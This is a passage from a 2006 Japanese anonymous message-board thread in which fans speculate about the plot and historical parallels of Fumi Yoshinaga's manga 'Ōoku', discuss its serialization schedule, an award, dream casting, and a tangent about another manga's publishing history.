もしや吉宗公に筆おろししてもらったのなら、大いなる誉れだよね。

124 :花と名無しさん:2006/12/09(土) 20:34:18 ID:???O
吉宗公は、夜の営み(昼に襲ってたが)を
どっちかといえば世継ぎをのこすための「公務」と思っているが
「けして嫌いではない」人、だと思った。
英雄、色を好むっていうか。

125 :花と名無しさん:2006/12/09(土) 21:17:04 ID:???0
美男ばっかり解雇したのは
史実の吉宗の実在のエピソード(美女集めて大量解雇)を踏まえてるだけでは。

よしながさんのお気に入りは杉下と聞いて納得。
ああいう影タイプのキャラどこまでも好きなんだな…

126 :花と名無しさん:2006/12/09(土) 23:33:49 ID:???0
>>124
紀州でも結構遊び人だったと言われてたしね

127 :花と名無しさん:2006/12/09(土) 23:48:09 ID:???0
史実の吉宗の異性の好みも「がっしりした女」だよ
丈夫な子供を生んでくれそうという理由らしい
まさに質実剛健

128 :花と名無しさん:2006/12/10(日) 00:04:15 ID:???O
いいよねぇ……
つかみどりだわ後腐れないわ最高だよ

129 :花と名無しさん:2006/12/10(日) 00:56:51 ID:???0
そーいや天一坊事件があるとしたらどうするんだろうw

130 :花と名無しさん:2006/12/10(日) 01:11:20 ID:???0
江島生島事件もどうするんだろうw
歌舞伎役者は男女入れ替わるのか、全員男設定のままでフォモな話が入るのかw

131 :花と名無しさん:2006/12/10(日) 01:21:06 ID:???O
ところで家光と千恵姫の眉が似てるというけど、よく見ると
春日局の眉も似ている。
正勝とは明らかに違うのに。
これはもしかして家光の実母説でいくんだろうか。
家康や秀忠、お江与や正成の姿が出て来ないと誰に似たのかわからないし、
実母に疎まれ乳母に溺愛された家光という方が話としては面白いけど。

132 :花と名無しさん:2006/12/10(日) 03:16:56 ID:???0
108の書き込みを読んで、
家光編は、2巻のあのラストで終わりなんじゃないかと思ってしまった。
メロディ掲載の次のお話は突然、家綱に時代が移って始まったりしないだろうか?
この板でどうするんだろう?とか書かれているようなもろもろの史実はスルーして、
各将軍、1代につき1エピソード(吉宗以外)な感じで、
どんどん飛ばしていくんじゃないかと思った。


133 :花と名無しさん:2006/12/10(日) 07:01:56 ID:???0
>132
メロディの予告によれば、家光とお万の話はまだ続くみたいだよ。
2人のつかの間の安らぎに、再び(?)暗雲が立ち込める展開という・・・

私個人としても、2巻ラストでばしっと切って吉宗公の時代に戻っても
展開にメリハリあっていいとも思うけど、これからが「大奥」構築の本筋に
入るからね。

134 :花と名無しさん:2006/12/10(日) 11:44:38 ID:???0
史実だと、お万の方と家光は子供がいないよね。
お万に子種が無いから、お玉を側室にせよ、と春日局の脅しが入るんだろうか…。

135 :花と名無しさん:2006/12/10(日) 12:26:43 ID:???0
>>134
お万に寵があるのは明らかな状態でお万に子種がないのがわかり、
そこで他の男の子種を求めるとごたごたが起きそうだから
お万に逆らうことのないお玉に子種を要求したりするんじゃないかと
個人的には思ってる。
家光が子供を産めるということは証明されてるんだし、
である以上、何が何でも子供は産まないといけないんだしね。

136 :花と名無しさん:2006/12/10(日) 13:55:23 ID:???0
通常なら、お褥上がりとか言って、30?過ぎたら側室はもう夜の相手辞退して、
自分の配下にある女をあてがったらしいけど…。(記憶胡乱)
お万との間に子が出来なかった説と、お万との間に出来た子を何らかの理由でお玉の子としたか説の
どちらかだと予想。

137 :花と名無しさん:2006/12/10(日) 13:59:49 ID:???0
まあ、将軍が女である以上、子供の子種なんて誰だって良いんだから
政治的に有利な人間を選んだ、ってだけかもね。

138 :花と名無しさん:2006/12/10(日) 14:04:49 ID:???0
>>137
いやそれ、逆でも同じことだよ

139 :花と名無しさん:2006/12/10(日) 18:11:46 ID:???0
しかし15代までやるとなると和宮は男になるんだろうか・・
さぞかしひ弱な男だろうな…
でも男の天ショウ院なんか楽しみだ。

なにより女慶喜が楽しみだ・・・!


140 :花と名無しさん:2006/12/10(日) 18:17:21 ID:???0
男子の数が激減したのを外国に隠すための鎖国だから
公武合体で京都からなんらかの情報が入ることがきっかけで赤面疱瘡の治療法が見つかって
そこから慶喜の代までに男子の数が増えて(死ななくなった分)きたから開国可能にるとか…


141 :花と名無しさん:2006/12/10(日) 21:29:58 ID:???0
春日は今のところ上様の婿は一人って考えてるよね。
有功との間に子供が生まれなかったから大奥は一人の女性に複数の男システムになったんだろうな。
有功の子供が順調に生まれてたら、案外一婦一夫制のまま行ったのかも。

春日の生きてきた時代からして、女の上様が重婚状態ってのは発想にないのかもしれない。
「子種のない有功を離縁しなされ」とか言われた千恵姫が「他の男の子を産んでも良いから
有功をそばに置かせてくれ」とか言って後の大奥システム(一人の女に沢山の男)が
できるのかも。

142 :花と名無しさん:2006/12/10(日) 21:49:24 ID:???0
それで行くと結局上様は好きな男性とは子どもを作れない運命なのか…(´・ω・`)カワイソス

143 :花と名無しさん:2006/12/10(日) 21:51:40 ID:???0
>>141
>「他の男の子を産んでも良いから有功をそばに置かせてくれ」
うわあ…ありそうな気がしてきた
直に他の男を宛てがわれるより、千恵も有巧もキツい精神状態になりそうだ

144 :花と名無しさん:2006/12/10(日) 21:55:56 ID:???0
ああ、楽しみすぎる

145 :花と名無しさん:2006/12/10(日) 21:56:14 ID:???0
それならお玉がお種様になるのも納得いくな

146 :花と名無しさん:2006/12/11(月) 00:17:50 ID:???0
1巻読み返してて気付いたけど、
水野の流水紋は、「お万好み」なんだよね。
大変趣味の良い方であった、というのも今のお万なら納得だね。

147 :花と名無しさん:2006/12/11(月) 00:27:06 ID:???0
私は参勤交代をどーするのかが気になってる
まさか「大名(男)を江戸に召還(気に入ったのは大奥入(ぉぃ)」で
領地は娘に継がせる男女逆転システム発動とかww

148 :花と名無しさん:2006/12/11(月) 02:18:33 ID:???O
子供が生まれた順番から考えると、
お玉より先にお楽とお夏か…?

149 :花と名無しさん:2006/12/11(月) 09:57:07 ID:???0
>>134
その前にお蘭(お楽の方)を江戸の町から連れて来るんじゃない?

150 :花と名無しさん :2006/12/11(月) 10:25:51 ID:???0
でもお種様の特定って難しくない?


151 :花と名無しさん:2006/12/11(月) 11:54:37 ID:???0
吉宗公なぞ神出鬼没で手当たり次第だからねえ…

152 :花と名無しさん:2006/12/11(月) 17:33:38 ID:???0
そこらへん自分も疑問に思ってた。吉宗様の時代までくると、とにかく
母親が上様でありさえすればいいって感じなのかな?
あとさ、男の子産まれたらその子はどういう立場になるんだろうか。

153 :花と名無しさん:2006/12/11(月) 18:10:46 ID:???0
>152
「他家に婿に入って山のように子供を作る」のが男子の本懐って水野の母上が言ってたw

154 :花と名無しさん:2006/12/11(月) 21:34:12 ID:???0
貴重な種だもんね…
実際江戸って男女比が不均衡で女は貴重だったみたいね

155 :花と名無しさん:2006/12/11(月) 21:35:54 ID:???0
>>148
お楽やお夏の前にお振も必要。

156 :花と名無しさん:2006/12/12(火) 00:24:29 ID:???0
>種の特定
たしかに、手当たり次第の場合難しいよね…
史実の吉宗も紀伊藩主だった父が湯殿で下女に孕ませた子だけど、この漫画の設定だと
例え本当の種が卯之吉だったとしても、上様が「杉下の種だ」と言えばそれで通りそうな。

「天一坊事件」とか出てこないかな〜(・∀・)ワクワク


157 :花と名無しさん:2006/12/12(火) 00:26:57 ID:???O
脛毛が嫌いなので剃らせる幼女将軍萌え。
つくり話で残念だった。

158 :花と名無しさん:2006/12/12(火) 11:56:37 ID:???0
あんな風に搾り取り御免で子作りしてれば、お種様特定なんて到底無理だから、
お種様とその一族の政治介入を制御できるんじゃないかと思った。

159 :花と名無しさん:2006/12/12(火) 11:59:51 ID:???O
二巻の話に戻っちゃうけど、結局あの上様は
お万の種にせよお玉にせよ、女の子しか
授からなかったんだよね?

160 :花と名無しさん:2006/12/12(火) 12:09:53 ID:???O
二巻で産んですぐに亡くなった女の子のエピは、初貫通時の記憶の中の子供だから
まだお万やお玉とは、全く関係はないよ。

161 :花と名無しさん:2006/12/12(火) 12:15:11 ID:???0
>>159が言いたいのは、これから上様が誰の種の子供を生むとしても、女の子しか授からないのだろうか?
ということをいいたいんじゃないのか

162 :花と名無しさん:2006/12/12(火) 16:37:15 ID:???O
性別は精子で決まるから。
全員女でその中に家綱とか男名前がいるのかもしれないし、
男が生まれてそれに千代とか女名前を付けたかもしれない。

163 :花と名無しさん:2006/12/12(火) 19:30:53 ID:???0
男が産まれてたら、そのまま男将軍で徳川家が続いて1巻の話にはならないじゃん。

164 :花と名無しさん:2006/12/12(火) 19:33:22 ID:???0
その男が赤面疱瘡にならんともかぎらんわけだが。

165 :花と名無しさん:2006/12/12(火) 19:37:13 ID:???0
>>163
へ?なんで?
男女逆転でも男子は産まれてるんだし
家光姫の時代で「女子が家を継ぐのが当然」のシステムが確立されるんでしょ。

多分2巻でお武家さまの男児が赤面疱瘡で死んで母親が
「男児ならまた産まれても赤面疱瘡で死ぬかも知れぬ!」
って叫んで父親がはっとするのが男女逆転開始のミソだと思う。
産まれても育つかどうかが危うい性より、生き残る側を動かす方が政治的にも安定するもの。


166 :花と名無しさん:2006/12/12(火) 20:11:39 ID:???0
あそっか。男が死んじゃう確率高いから女系将軍システムになるのか。



167 :花と名無しさん:2006/12/12(火) 20:24:48 ID:???0
>>158
それが狙いかもね
大奥ってシステムが出来上がってからは政治を左右する将軍の生殖を管理するのが
重要な目的になったし

168 :花と名無しさん:2006/12/14(木) 12:18:13 ID:???0
え、てゆーか、「跡取りは女」が大前提で始まってる話でしょ?「大奥」

169 :花と名無しさん:2006/12/14(木) 13:14:00 ID:???0
や、だからその前提がどういう過程で確立してくのかって話。

170 :花と名無しさん:2006/12/14(木) 23:34:54 ID:???0
2巻読む限りだと春日は家光姫の立場をあくまで跡継ぎ(男)生むまでの繋ぎ、としか考えていないしね。
今のところは世の中の男が減っても将軍家だけは男系で、って考えが強そう。

171 :花と名無しさん:2006/12/15(金) 03:22:50 ID:???0
史実では吉宗が将軍になったときにはすでに家重がいたよね。
でもこの大奥の吉宗は子供もいないみたいだし、
人間関係を微妙に変えてくるのかな。

172 :花と名無しさん:2006/12/15(金) 15:11:57 ID:???0
>170
同意。
種馬扱いなのは当然としても跡継ぎ出来たら男を始末する気満々に見える。
(上様は一応かわいい家光の血を引いてるから嫁に出すか最悪でも出家させるつもり?)

女将軍でいこうと言い出すのは春日の局じゃなくてお万たちの方かも。
いきなりは難しいから史実でも病弱だった4代までは男で生まれるけど赤面疱瘡でアボーン
→やっぱり女子で継承の流れになるのでは?

173 :花と名無しさん:2006/12/15(金) 16:54:19 ID:???0
2巻の春日は上様に男児が生まれたら即、男系に戻れる、と考えていたけど
10〜11年後?春日が世を去る時には、
赤面疱瘡で何人かの姫君しか残らなかったんだろう。
その頃には庶民も家長が女性に移り変わり始めていたから、
武家社会も4代将軍を女性にすると公言しても反対は弱いと思う。

遠からず男子は全滅する、日本は滅びると悲観し
正資に没日録を書かせたんだと。

174 :花と名無しさん:2006/12/15(金) 21:51:56 ID:???0
史実では家綱は家光(父)37歳の時に生まれてるね
だから千恵上様、あれからすぐ家綱を懐妊と言う計算に

175 :花と名無しさん:2006/12/15(金) 21:53:57 ID:???0
今のところ必ずしも史実通りにはストーリが運ばれてないので
生年が数年ずれたりして変えてくるかも。

176 :花と名無しさん:2006/12/15(金) 21:57:50 ID:???0
懐妊という言葉でふと気付いたんだが、家光姫の最初の出産に立ち会った産婆たちは、
やっぱりあの後すっぱり始末されたんだろうか・・・・

177 :花と名無しさん:2006/12/15(金) 22:01:22 ID:???0
>>174
産婆は春日局が一人でつとめていたように見えた。

178 :花と名無しさん:2006/12/15(金) 22:53:26 ID:???0
>177
え・・・!?あれ春日だったのか!しかも一人orz
コミックス手元にあるのに、かなり辛いエピだからしっかり確認してなかった。ありがとう。


179 :花と名無しさん:2006/12/16(土) 16:05:24 ID:???0
>>174
ってことは、今回生まれた姫が千代姫なのか。
じゃ、あのレイプ男がお振?
史実では、家光の最初の子供の母親で、
生まれた娘は、家光唯一にして最愛の娘だってのに、ちょっとカワイソウだ。

180 :花と名無しさん:2006/12/16(土) 21:05:52 ID:???0
全て史実をなぞるとも思えないので、あのすぐに死んでしまった姫は特に該当する人物はいないんではないかな。


181 :花と名無しさん:2006/12/18(月) 01:49:00 ID:???0
公式サイトのメロ次号予告 (次号表紙&新展開!!)
『有功と家光が結ばれて一年。
平穏を取り戻したかに見えた江戸城内に…!?』

と掲載されているって事は、コミクスで最後に抱きしめあった後
男女関係がめでたく成立したって事なのかなぁ。
メロだから、その描写がちょっとぐらいあっても構わないと思うのに
飛ばして一年後ストーリーになっちゃうのか?

182 :花と名無しさん:2006/12/18(月) 01:58:54 ID:???0
結ばれ=えっち ではない予感w
有功のおかげで家光姫の精神が落ち着いた…てことでないか?

183 :花と名無しさん:2006/12/18(月) 02:22:14 ID:???0
でも家光姫は初貫通の後、男と致してないと思うし
心の傷を癒すためにエチーがあってもいいと思うのだけど。

別の話題だが、「大奥」が↓の作品として選ばれたらしい。
ttp://plaza.bunka.go.jp/festival/sakuhin/index.html
「平成18年度(第10回)文化庁メディア芸術祭」漫画部門・優秀賞
そのうちコミクス増刷の時には、帯に書かれたりするかな。

184 :花と名無しさん:2006/12/18(月) 02:46:51 ID:???0
>>183
それって以前、ネットで投票をつのってた賞では。
あらかじめ選ばれた作品に投票する人気投票的なものだから
権威とかあるんだろうか。

185 :花と名無しさん:2006/12/18(月) 02:59:19 ID:???0
>>184
そうそう。ネットで投票してたやつ。権威があるかは知らないが
「優秀賞」だと副賞で30万円貰えるらしい。良かったねw>よしながさん
恵比寿のウェスティンホテル東京って所で、授賞式をやると書かれて
いるのでTVニュースになるかもねー。

186 :花と名無しさん:2006/12/18(月) 06:25:36 ID:???O
権威があるかは別として、受賞作品は毎回クオリティが高いと思う。
何にせよ、おめでたい事ですな。
個人的に、よつばと!と百鬼が選出されてて嬉しい賞だ。

187 :花と名無しさん:2006/12/18(月) 09:35:03 ID:???0
30万円てまた微妙なw

188 :花と名無しさん:2006/12/18(月) 14:28:52 ID:???O
H描写いらねーです

189 :花と名無しさん:2006/12/18(月) 17:35:36 ID:???0
お万に種がなくて他の男と子供作らなきゃいけないなら
ちらっとでいいから初期の幸せだった閨の様子も見てみたい
種がないとなったら閨に侍ることも許されなさそうだしな…

190 :花と名無しさん:2006/12/18(月) 20:35:08 ID:???O
二人の仲が進展してる描写は、床入り以外にいくらでもあるだろうに


191 :花と名無しさん:2006/12/19(火) 01:37:57 ID:???0
これって既出?(某所からのコピペの抜粋)
-------------------------------------------------
「よしながふみ×萩尾望都対談」
12/18発売の『このマンガを読め!2007』に、
よしながふみさんと萩尾望都さんの対談が収録されています。
ttp://webfreestyle.com
-------------------------------------------------
発行元:(株)フリースタイル
雑誌のISBN:ISBN4-939138-34-8 C0000/定価790円

今日、地元最大手の書店に行ったら、入荷してなかった(取扱一切なし)。
出版社関係からの、宣伝書き込みのコピペなんだけど
その宣伝者によると弱小出版社のせいか、どこの書店でも扱って
もらっているとは限らない…と。
発行元サイト見ると、扱ってる店リストが出てくる&密林はおkらしい。

192 :花と名無しさん:2006/12/19(火) 02:01:48 ID:???0
最近よく対談にかり出されてるね…

193 :花と名無しさん:2006/12/19(火) 08:14:10 ID:???0
>>191
トンクス
密林おKなのは知らなかった
注文しよー

194 :花と名無しさん:2006/12/19(火) 16:52:13 ID:???O
カ〜ラ教授との対談は微妙だったなぁ。面白い部分もあったけど…。

195 :花と名無しさん:2006/12/19(火) 21:32:54 ID:???0
よしながさんのムチ使いは確かにいいw

196 :花と名無しさん:2006/12/20(水) 16:43:05 ID:???0
一巻でお玉の名前って何ページに出てるでしょうか?教えてください。
前スレで名前が出てたって書いてあった気がするので…

197 :花と名無しさん:2006/12/20(水) 21:00:14 ID:???0
お玉じゃなくて「お万の方」の名前が出てたって話じゃないの?
水野が黒一色の裃を作らせた時に、「お万好み」の話として出てくるよ。

198 :花と名無しさん:2006/12/20(水) 21:31:41 ID:???0
>>197
前スレで、お万もお玉も1巻に名前が出てたと
書いてた人がいたんですよ。
私もお玉の方はわからなかった.

111Pのお万についてを、お玉と勘違いしたのかな?と思ったけど
きちんと出てるんでしょうか。
漫画は文字検索できないからつらいよw


199 :花と名無しさん:2006/12/20(水) 21:51:08 ID:???0
白血病ってほんと生存率低いのな

200 :花と名無しさん:2006/12/20(水) 21:58:22 ID:???0
青島か

201 :花と名無しさん:2006/12/20(水) 22:00:42 ID:???0
カンニングもだ

202 :花と名無しさん:2006/12/21(木) 02:13:43 ID:???O
お万種無し→お玉と上様の見届け人
そんな流れだったら、つらすぎる

203 :花と名無しさん:2006/12/21(木) 02:34:09 ID:???O
通説どおりならお万は長生きするはずだし
何とか幸せに生きたって事で…

204 :花と名無しさん:2006/12/21(木) 05:46:38 ID:???0
>>203
そうだな、お万は長生きする
お万は、な……

205 :花と名無しさん:2006/12/21(木) 07:51:49 ID:???0
>>198
前スレ見てきたけど、そう言ってるのは一人だし、
その人も「うろ覚えだけど」と言ってる。

206 :花と名無しさん:2006/12/21(木) 13:55:35 ID:???O
公表されてる男家光の享年と一致させるとしたら女家光は二十代後半でアボン?
上様の死まで描かれるかな?三代は生涯に渡ってドラマチックだし…

お玉も上様に恋愛感情持ったら面白いな、余計ドロつくけど

207 :花と名無しさん:2006/12/21(木) 16:21:25 ID:???0
お玉は有功一筋で居てください

208 :花と名無しさん:2006/12/21(木) 20:42:35 ID:???0
家光姫、”重し”だった春日が死ぬか病で弱れば、男装を強いられてきた反動で目いっぱい派手に着飾りそうだ。
思えば、一巻で吉宗が乗り込んだ時の大奥内の風俗って、「何処の花魁ですか?」ってくらい
派手派手だったし。
それが家光姫からの大奥の風習だったりして・・


209 :花と名無しさん:2006/12/21(木) 20:42:57 ID:???O
お玉が上様に嫉妬する泥沼展開wktk

210 :花と名無しさん:2006/12/21(木) 20:46:39 ID:???O
三代死亡→四代
この流れって実は家光姫死亡じゃなくて、
女性将軍容認で姫が四代将軍に就任てだけだと思ってるんだけど
深読みしすぎかな?

211 :花と名無しさん:2006/12/21(木) 21:17:54 ID:???O
玉栄としては、お万ラブかつ彼を守る最大の楯になる上様には好意的?かも。
お楽やお夏も美男子なのかね、家光がお万に落ちただけに。
お玉お夏のバトル見たいw

212 :花と名無しさん:2006/12/21(木) 21:18:58 ID:???0
家光の影武者やってる春日の息子が死んでその死体を「家光」として葬る→姫が女に戻って4代目就任(5代将軍が家光とお玉の子)じゃなかろうかと思ってたんだけど…
でも一巻で春日局が「この国の滅び行くさまを…」て記録させてるってことは春日存命中に男女逆転が進んだって事だから…うーん

213 :花と名無しさん:2006/12/21(木) 21:25:32 ID:???0
村瀬が吉宗様に「3代家光公も” もとは ”男であらせられた」と語ってるから
千恵姫はやっぱり3代目家光のままかと。
そうなれば史実の家光がやった「余は生まれついての将軍である」宣言を目一杯着飾った家光姫がするんだろうな。

214 :花と名無しさん:2006/12/21(木) 21:27:45 ID:???0
おもしろいなあ。

215 :花と名無しさん:2006/12/21(木) 21:36:54 ID:???O
女家光様はあまり長生きしなさそうにも見える
作中ナレーションでも悲劇的っぽく感じた、なんとなくだが

216 :花と名無しさん:2006/12/21(木) 23:04:23 ID:???0
【芸能】水野裕子が「将軍様」役で時代劇デビュー 女同士の濡れ場にも挑戦
http://www.zakzak.co.jp/gei/2006_12/g2006122115.html

>それによると、家重の頭蓋骨や腰骨には、解剖学の面から見て女性的な特徴があるという。
>8代将軍・吉宗は男の子宝に恵まれず、将軍の座をめぐる御三家間の争いに勝つため、
>ひそかに娘に男装をさせ、「世継ぎ」に仕立てた−というのだ。


ちょっと待てw

217 :花と名無しさん:2006/12/21(木) 23:26:08 ID:???0
うはwwwwwwwwwwwwwwwwwwwww

218 :過去ログ倉庫の中の人:2006/12/21(木) 23:39:51 ID:???0
再現ドラマ(再現じゃないけど)なら、是非とも少佐に吹き替えをwwwww

219 :花と名無しさん:2006/12/21(木) 23:45:28 ID:???0
>>216
何コレ、ネタじゃなくマジ?
よしなが大奥にハマってる自分には、まるで一部設定パクに見えちゃうwwwww

220 :花と名無しさん:2006/12/22(金) 01:00:11 ID:???O
吉宗って晩年は、御三家さしおいて自分の血筋に
将軍継がそうと血眼になった人だからさもありなん

221 :花と名無しさん:2006/12/22(金) 01:14:33 ID:???0
吉宗って御三家ならぬ「御三卿」制度作った人だよね。
でも家重以外に優秀な男の子がいたような気がするんだけど…

222 :花と名無しさん:2006/12/22(金) 17:43:56 ID:???O
死んだのか、それともアホの子でも長男が可愛かったのだろうか>優秀な男子
江戸城住まいの御三郷のお陰でお家騒動が激化したそうだし
吉宗の晩年は政治家の暗い側面がつきまとうね。倹約令も成功とは言い難い。
そこをよしながさんが描くのか、気になる…

223 :花と名無しさん:2006/12/22(金) 20:58:10 ID:???0
なんで皆、そうなんでも史実どおりにしたがるんだ。
歴史物漫画じゃないんだぞ。

224 :花と名無しさん:2006/12/22(金) 21:30:44 ID:???0
史実と全然違っててもつまらない。
どれだけ微妙に違っているかを楽しむのがパラレル時代劇の醍醐味だと思う。
(吉宗の美女リストラとかさ)

225 :花と名無しさん:2006/12/22(金) 23:01:13 ID:???0
>222
アホの子だと甲斐性がなくてつぶしがきかん

226 :花と名無しさん:2006/12/23(土) 00:07:15 ID:???0
弟がアフタ買ってきたんで借りて読んでたらメロディの広告があった。
表紙がモノクロだけど載ってて、あれはお万なのかな?
片肌脱いで弓を打つバストショット。
前髪は落としてないけど結い方は上様みたいな感じになってた。


227 :花と名無しさん:2006/12/23(土) 00:48:35 ID:???0
それはバストと肩肌脱ぎの胸チラをかけてるのかい?

228 :花と名無しさん:2006/12/23(土) 01:17:14 ID:???0
いやそのまま、胸から上の図ってことw
まあ広告のレイアウトでそうなっただけで、実際の表紙はもしかしたら全身なのかも。

229 :花と名無しさん:2006/12/25(月) 06:13:46 ID:???0
うーん、ぜひ谷原さんでドラマ化してほしいな〜。
家光を志田未来で、お玉はウエンツあたりで。
春日はピン子。
吉宗は浅野ゆうことか。

230 :花と名無しさん:2006/12/25(月) 07:32:33 ID:???0
>>229
参考までに…テレビドラマ板にこんなスレあるよ。

漫画アニメ等の実写化キャスティングを考えよう 8
http://ex13.2ch.net/test/read.cgi/tvd/1160336533/

231 :花と名無しさん:2006/12/25(月) 18:21:23 ID:???0
ドラマ化したらどう考えてもジャニィズになりそうだなぁ・・・嫌だ。

232 :花と名無しさん:2006/12/25(月) 19:15:31 ID:???0
ハラショーは好きだけど、トシがなあ…。ギリギリ20代でないとキツイと思う。

233 :花と名無しさん:2006/12/25(月) 19:17:43 ID:???0
エイジはリングのジャニーズだから滝沢でも百歩譲ってありかもしんないけど、
有功のジャニタレは勘弁して欲すぃ。亀とかだったら暴れるw

吉宗公は木村多江がいいのう…

234 :花と名無しさん:2006/12/25(月) 20:37:37 ID:???0
木村多江、いいねぇ!

235 :花と名無しさん:2006/12/25(月) 20:48:24 ID:???0
江角マキコとかどないだ。

そろそろスレ違い?

236 :花と名無しさん:2006/12/25(月) 21:06:19 ID:???0
ごめんスレ違いは私が原因(229)

年を考えてなかった。たしかに20代だね。
では、スレに戻ってください。

237 :花と名無しさん:2006/12/26(火) 22:18:38 ID:sRuhEdML0
テレ東の「大奥ミステリー」って番組で
9代将軍が女性だったのでは?!
ってやってるよ

238 :花と名無しさん:2006/12/26(火) 22:20:52 ID:???0
>>237
>>216か?

239 :花と名無しさん:2006/12/27(水) 14:39:13 ID:???0
よ、よしながぁぁぁぁ〜〜〜〜〜〜〜〜〜〜?!!!!
遅筆なのは知っているんだけどぉ〜
明日発売のメロの続きが「「4月28日発売の6月号」」って…半年も先かyo!
バレスレで簡易バレ読んで喜んだのも束の間…_| ̄|○

240 :花と名無しさん:2006/12/27(水) 14:53:29 ID:???0
マジでえええええっっ!?
おっそorz

241 :花と名無しさん:2006/12/27(水) 15:12:11 ID:???0
>>239
このペースで描いてて来年滞りなく3巻出るのかなぁ・・・

242 :花と名無しさん:2006/12/27(水) 15:14:31 ID:???O
>239
餅つけ、四ヵ月後だよ…。
でも長いなちくしょー!

243 :花と名無しさん:2006/12/27(水) 15:15:47 ID:???0
つか、大奥のコミクスは1年に1冊ペースがデフォ?フラワーが完結した後
すでに次の作品の予定があって、大奥はゆったりペースなのか?
…こんなにのんびりやってて、連載へのやる気がそがれたりしないのか?
うーむ。疑問ばかりが浮かぶぜよ。

244 :239:2006/12/27(水) 15:17:13 ID:???0
>>242
d!そか、6月号なだけで4月末か…しかし長い。

245 :花と名無しさん:2006/12/27(水) 16:07:35 ID:???0
もともとやる気まんまんで始めたというより編集に後押しされて
始めた連載だから、まったり進行でも本人は平気そう

246 :花と名無しさん:2006/12/27(水) 19:24:05 ID:???0
多分、その間にがっつりBLな作品書くんじゃない?
まあこの人はBL書かないと、他の作品にも影響がきそうだし
とりあえずそれでバランスとれるんじゃ仕方ないかなと
思うことにする。

247 :花と名無しさん:2006/12/27(水) 19:47:32 ID:???0
贅沢は言わないから、せめて隔月ペースはお願いしたい・・・orz

248 :花と名無しさん:2006/12/27(水) 20:20:36 ID:???0
隔月ペースって、メロディ発売自体が隔月じゃないっけ?

249 :花と名無しさん:2006/12/27(水) 21:02:05 ID:???O
>>246
今年はBLを多めに描きたいって確かに言ってたよ。
去年少なめだったので描きたい欲が溜まってきたとか

250 :花と名無しさん:2006/12/27(水) 21:10:46 ID:???0
>>248
だから、せめて休載は無しでお願いって事で。

251 :花と名無しさん:2006/12/27(水) 21:21:33 ID:???0
メロディの一回おき掲載でもいいよ
先が長いなら今のクォリティを保つの大変そうだし

252 :花と名無しさん:2006/12/27(水) 22:10:21 ID:???0
>>245
その編集の説得の言葉というのが
「かつてララでは『日出処の天子』という作品を連載していたんです。
うち(白泉社)ってのはそういうところなんですよ。
今メロディで『大奥』を書かなくてどうしますか!」
とかいうもので、それがけっきょく決め手になったって読んで、
よしながさんのくすぐりどころを心得てる編集さんの手腕に笑った。

253 :花と名無しさん:2006/12/27(水) 22:10:23 ID:???0
「大奥」からこの人の作品を読むようになった。
801が苦手なので、「彼は花園で夢を見る 」
「愛すべき娘たち」、「フラワー・オブ・ライフ」しか
読めてないんだが、背景がなくて驚いた。
(話はどれも大好きですが)

「大奥」だけ別格と言っていいほど、背景しっかりある。
それだけ力入れて描いてるんだろうから、
のんびりペースでええです……。

254 :花と名無しさん:2006/12/27(水) 23:01:05 ID:???0
>>252
そんな縁起でもない説得の仕方w

255 :花と名無しさん:2006/12/27(水) 23:37:14 ID:???0
>>254
なんで縁起でもないの?
日出処の天子って今でも語り継がれる名作じゃん
大奥もそうなったらいいなあ

256 :花と名無しさん:2006/12/27(水) 23:40:48 ID:???0
>>255
たしか途中で作者が編集のほうともめて、何かあったんじゃなかったっけ
(ごめん超うろおぼえ)

257 :花と名無しさん:2006/12/27(水) 23:49:30 ID:???0
ナントカ新聞に「これが聖徳太子?」とかいう捏造記事書かれた件?

258 :花と名無しさん:2006/12/27(水) 23:49:44 ID:???0
>>256
なんかあったみたいだね
超少女明日香の人とかホモ漫画家本橋さんも
もめて白線と決別したらしいし
編集と作家がもめるのはデフォな出版社なんだろう

259 :花と名無しさん:2006/12/27(水) 23:51:38 ID:???0
>>256
最終巻がペラペラに薄かったね。

260 :花と名無しさん:2006/12/27(水) 23:54:42 ID:???0
揉めたのは番外編の「馬屋古女王」のほうですね。
本編連載中は、いたって良好な関係だったと思う。
題字を縦に入れるとか、カラー印刷の再現度の高さとか、
淡くて渋い中間色だらけの色遣いでも文句を言われないとか、
当時にしては破格で斬新なことを次々とやってくれたと
山岸さん自身が言っていたよ。



261 :花と名無しさん:2006/12/27(水) 23:57:40 ID:???0
最終巻がペラかったのは、
その番外編込みで一冊にする予定だったのが
番外のほうが前編のみの掲載で頓挫したからでっす。



262 :花と名無しさん:2006/12/28(木) 00:01:56 ID:???0
今日本屋に行ったら、メロディあったけど、早売りだったのか。
うわーあの引きで、続きがそんな先なんて焦らしプレイにも程があるww

263 :花と名無しさん:2006/12/28(木) 00:15:42 ID:???0
>>258
明日香の人w(和田氏)は、当時編集長の交代の際に
方針が変わってトラブったらしいと言うのがもっぱらの噂だが、
ご本人が頑としてバラす気がないので、真相は闇の中。

>>260
山岸さんの処天にそんな逸話があったとは知らなんだ。
改めて後で読み返そうかな。

264 :254:2006/12/28(木) 00:27:46 ID:???0
>>260
そう、ずる天じゃなくて馬屋古の方だった、ごめん。
山岸凉子が体調のせいか何かで原稿を途中までしかあげられなくて
当然、続きを次の号に掲載してもらえると思っていたら
当時ララは子飼の(ララ出身の)若手漫画家中心に方針転換し始めた頃で
次号に馬屋古の続きを載せる余地がなかったのね
それが山岸先生のプライドを傷つけて、結局白泉社とおさらばする羽目に…
当時花ゆめの編集してた知人から聞いた話です

>>257
確かに毎日新聞の記者が捏造したことがあった
「聖徳太子をホモの超能力者に描かれて四天王寺(聖徳太子が建立)が激怒している」
うちは毎日大阪本社版とってたから、この記事見たときは驚いた。
何日かして「根も葉もない捏造でした、ごめんなさい」って謝罪記事が載った。
四天王寺のぼんさんはそんな漫画が存在することは知らなかったって。

265 :花と名無しさん:2006/12/28(木) 00:29:01 ID:???0
スレ違い長文、ごめん

266 :花と名無しさん:2006/12/28(木) 01:29:05 ID:???0
>>265
スレ違いだが、貴重な話を聞けた。
毎日の記者、何を思ってそんな捏造記事を…。スポ紙じゃあるまいし一応全国紙なのに。

267 :花と名無しさん:2006/12/28(木) 01:41:34 ID:???0
え、捏造記事が元だったんだ!?
昔々、その某寺の経営してる高校に通ってたけど、
校長とかもやってたえらい坊さんが「日出処〜」を嫌ってて、
「コレが本当の聖徳太子漫画だ!」って主張する為に
池田理代子に「聖徳太子」って漫画を描かせた…って噂が、
クラスでもまことしやかに囁かれてたよ…おおお?


って、スレ違い。
今号を読んだ。
このまま4月末までお預けなんて…辛い…

268 :花と名無しさん:2006/12/28(木) 01:54:19 ID:???0
一瞬、スレを間違えたのかと思ったw

>>260
縦書きタイトル+中間色の渋い色遣いっていうと
